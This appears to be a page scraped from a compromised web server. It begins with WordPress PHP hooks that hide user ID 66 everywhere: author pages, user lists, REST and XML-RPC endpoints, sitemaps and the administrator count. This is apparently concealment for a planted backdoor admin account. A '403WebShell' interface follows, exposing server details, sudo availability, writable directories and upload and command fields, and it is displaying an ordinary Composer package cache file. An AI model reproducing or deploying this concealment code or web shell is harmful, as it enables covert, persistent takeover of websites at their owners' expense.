add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/.cache/composer/repo/https---repo.packagist.org/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/.cache/composer/repo/https---repo.packagist.org/provider-sebastian~object-reflector.json
{"minified":"composer/2.0","packages":{"sebastian/object-reflector":[{"name":"sebastian/object-reflector","description":"Allows reflection of object attributes, including inherited and non-public ones","keywords":[],"homepage":"https://github.com/sebastianbergmann/object-reflector/","version":"4.0.1","version_normalized":"4.0.1.0","license":["BSD-3-Clause"],"authors":[{"name":"Sebastian Bergmann","email":"sebastian@phpunit.de"}],"source":{"url":"https://github.com/sebastianbergmann/object-reflector.git","type":"git","reference":"6e1a43b411b2ad34146dee7524cb13a068bb35f9"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/object-reflector/zipball/6e1a43b411b2ad34146dee7524cb13a068bb35f9","type":"zip","shasum":"","reference":"6e1a43b411b2ad34146dee7524cb13a068bb35f9"},"type":"library","support":{"issues":"https://github.com/sebastianbergmann/object-reflector/issues","security":"https://github.com/sebastianbergmann/object-reflector/security/policy","source":"https://github.com/sebastianbergmann/object-reflector/tree/4.0.1"},"funding":[{"url":"https://github.com/sebastianbergmann","type":"github"}],"time":"2024-07-03T05:01:32+00:00","autoload":{"classmap":["src/"]},"extra":{"branch-alias":{"dev-main":"4.0-dev"}},"require":{"php":">=8.2"},"require-dev":{"phpunit/phpunit":"^11.0"}},{"version":"4.0.0","version_normalized":"4.0.0.0","source":{"url":"https://github.com/sebastianbergmann/object-reflector.git","type":"git","reference":"bb2a6255d30853425fd38f032eb64ced9f7f132d"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/object-reflector/zipball/bb2a6255d30853425fd38f032eb64ced9f7f132d","type":"zip","shasum":"","reference":"bb2a6255d30853425fd38f032eb64ced9f7f132d"},"support":{"issues":"https://github.com/sebastianbergmann/object-reflector/issues","security":"https://github.com/sebastianbergmann/object-reflector/security/policy","source":"https://github.com/sebastianbergmann/object-reflector/tree/4.0.0"},"time":"2024-02-02T06:02:18+00:00"},{"version":"3.0.0","version_normalized":"3.0.0.0","source":{"url":"https://github.com/sebastianbergmann/object-reflector.git","type":"git","reference":"24ed13d98130f0e7122df55d06c5c4942a577957"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/object-reflector/zipball/24ed13d98130f0e7122df55d06c5c4942a577957","type":"zip","shasum":"","reference":"24ed13d98130f0e7122df55d06c5c4942a577957"},"support":{"issues":"https://github.com/sebastianbergmann/object-reflector/issues","source":"https://github.com/sebastianbergmann/object-reflector/tree/3.0.0"},"time":"2023-02-03T07:06:18+00:00","extra":{"branch-alias":{"dev-main":"3.0-dev"}},"require":{"php":">=8.1"},"require-dev":{"phpunit/phpunit":"^10.0"}},{"version":"2.0.4","version_normalized":"2.0.4.0","source":{"url":"https://github.com/sebastianbergmann/object-reflector.git","type":"git","reference":"b4f479ebdbf63ac605d183ece17d8d7fe49c15c7"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/object-reflector/zipball/b4f479ebdbf63ac605d183ece17d8d7fe49c15c7","type":"zip","shasum":"","reference":"b4f479ebdbf63ac605d183ece17d8d7fe49c15c7"},"support":{"issues":"https://github.com/sebastianbergmann/object-reflector/issues","source":"https://github.com/sebastianbergmann/object-reflector/tree/2.0.4"},"time":"2020-10-26T13:14:26+00:00","extra":{"branch-alias":{"dev-master":"2.0-dev"}},"require":{"php":">=7.3"},"require-dev":{"phpunit/phpunit":"^9.3"}},{"version":"2.0.3","version_normalized":"2.0.3.0","source":{"url":"https://github.com/sebastianbergmann/object-reflector.git","type":"git","reference":"d9d0ab3b12acb1768bc1e0a89b23c90d2043cbe5"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/object-reflector/zipball/d9d0ab3b12acb1768bc1e0a89b23c90d2043cbe5","type":"zip","shasum":"","reference":"d9d0ab3b12acb1768bc1e0a89b23c90d2043cbe5"},"support":{"issues":"https://github.com/sebastianbergmann/object-reflector/issues","source":"https://github.com/sebastianbergmann/object-reflector/tree/2.0.3"},"time":"2020-09-28T05:56:16+00:00"},{"version":"2.0.2","version_normalized":"2.0.2.0","source":{"url":"https://github.com/sebastianbergmann/object-reflector.git","type":"git","reference":"127a46f6b057441b201253526f81d5406d6c7840"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/object-reflector/zipball/127a46f6b057441b201253526f81d5406d6c7840","type":"zip","shasum":"","reference":"127a46f6b057441b201253526f81d5406d6c7840"},"support":{"issues":"https://github.com/sebastianbergmann/object-reflector/issues","source":"https://github.com/sebastianbergmann/object-reflector/tree/master"},"time":"2020-06-26T12:12:55+00:00","require":{"php":"^7.3 || ^8.0"},"require-dev":{"phpunit/phpunit":"^9.0"}},{"version":"2.0.1","version_normalized":"2.0.1.0","source":{"url":"https://github.com/sebastianbergmann/object-reflector.git","type":"git","reference":"14e04b3c25b821cc0702d4837803fe497680b062"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/object-reflector/zipball/14e04b3c25b821cc0702d4837803fe497680b062","type":"zip","shasum":"","reference":"14e04b3c25b821cc0702d4837803fe497680b062"},"time":"2020-06-15T13:08:02+00:00","require":{"php":"^7.3"}},{"version":"2.0.0","version_normalized":"2.0.0.0","source":{"url":"https://github.com/sebastianbergmann/object-reflector.git","type":"git","reference":"f4fd0835cabb0d4a6546d9fe291e5740037aa1e7"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/object-reflector/zipball/f4fd0835cabb0d4a6546d9fe291e5740037aa1e7","type":"zip","shasum":"","reference":"f4fd0835cabb0d4a6546d9fe291e5740037aa1e7"},"support":{"issues":"https://github.com/sebastianbergmann/object-reflector/issues","source":"https://github.com/sebastianbergmann/object-reflector/tree/2.0.0"},"time":"2020-02-07T06:19:40+00:00","funding":"__unset"},{"version":"1.1.3","version_normalized":"1.1.3.0","source":{"url":"https://github.com/sebastianbergmann/object-reflector.git","type":"git","reference":"1d439c229e61f244ff1f211e5c99737f90c67def"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/object-reflector/zipball/1d439c229e61f244ff1f211e5c99737f90c67def","type":"zip","shasum":"","reference":"1d439c229e61f244ff1f211e5c99737f90c67def"},"support":{"issues":"https://github.com/sebastianbergmann/object-reflector/issues","source":"https://github.com/sebastianbergmann/object-reflector/tree/1.1.3"},"funding":[{"url":"https://github.com/sebastianbergmann","type":"github"}],"time":"2024-03-01T13:56:04+00:00","extra":{"branch-alias":{"dev-master":"1.1-dev"}},"require":{"php":">=7.0"},"require-dev":{"phpunit/phpunit":"^6.0"}},{"version":"1.1.2","version_normalized":"1.1.2.0","source":{"url":"https://github.com/sebastianbergmann/object-reflector.git","type":"git","reference":"9b8772b9cbd456ab45d4a598d2dd1a1bced6363d"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/object-reflector/zipball/9b8772b9cbd456ab45d4a598d2dd1a1bced6363d","type":"zip","shasum":"","reference":"9b8772b9cbd456ab45d4a598d2dd1a1bced6363d"},"support":{"issues":"https://github.com/sebastianbergmann/object-reflector/issues","source":"https://github.com/sebastianbergmann/object-reflector/tree/1.1.2"},"time":"2020-11-30T07:37:18+00:00"},{"version":"1.1.1","version_normalized":"1.1.1.0","source":{"url":"https://github.com/sebastianbergmann/object-reflector.git","type":"git","reference":"773f97c67f28de00d397be301821b06708fca0be"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/object-reflector/zipball/773f97c67f28de00d397be301821b06708fca0be","type":"zip","shasum":"","reference":"773f97c67f28de00d397be301821b06708fca0be"},"support":{"issues":"https://github.com/sebastianbergmann/object-reflector/issues","source":"https://github.com/sebastianbergmann/object-reflector/tree/master"},"time":"2017-03-29T09:07:27+00:00","require":{"php":"^7.0"},"funding":"__unset"},{"version":"1.1.0","version_normalized":"1.1.0.0","source":{"url":"https://github.com/sebastianbergmann/object-reflector.git","type":"git","reference":"afd5797e7af7c9f529879ad5e8e8abe126c89dab"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/object-reflector/zipball/afd5797e7af7c9f529879ad5e8e8abe126c89dab","type":"zip","shasum":"","reference":"afd5797e7af7c9f529879ad5e8e8abe126c89dab"},"support":{"issues":"https://github.com/sebastianbergmann/object-reflector/issues","source":"https://github.com/sebastianbergmann/object-reflector/tree/1.1.0"},"time":"2017-03-16T14:05:21+00:00"},{"version":"1.0.0","version_normalized":"1.0.0.0","source":{"url":"https://github.com/sebastianbergmann/object-reflector.git","type":"git","reference":"2201553542d60d25db9c5b2c54330df776648008"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/object-reflector/zipball/2201553542d60d25db9c5b2c54330df776648008","type":"zip","shasum":"","reference":"2201553542d60d25db9c5b2c54330df776648008"},"support":{"issues":"https://github.com/sebastianbergmann/object-reflector/issues","source":"https://github.com/sebastianbergmann/object-reflector/tree/1.0.0"},"time":"2017-03-12T15:10:22+00:00","extra":{"branch-alias":{"dev-master":"1.0-dev"}}}]},"security-advisories":[],"last-modified":"Wed, 03 Jul 2024 05:01:47 GMT"}

Youez - 2016 - github.com/yon3zu
LinuXploit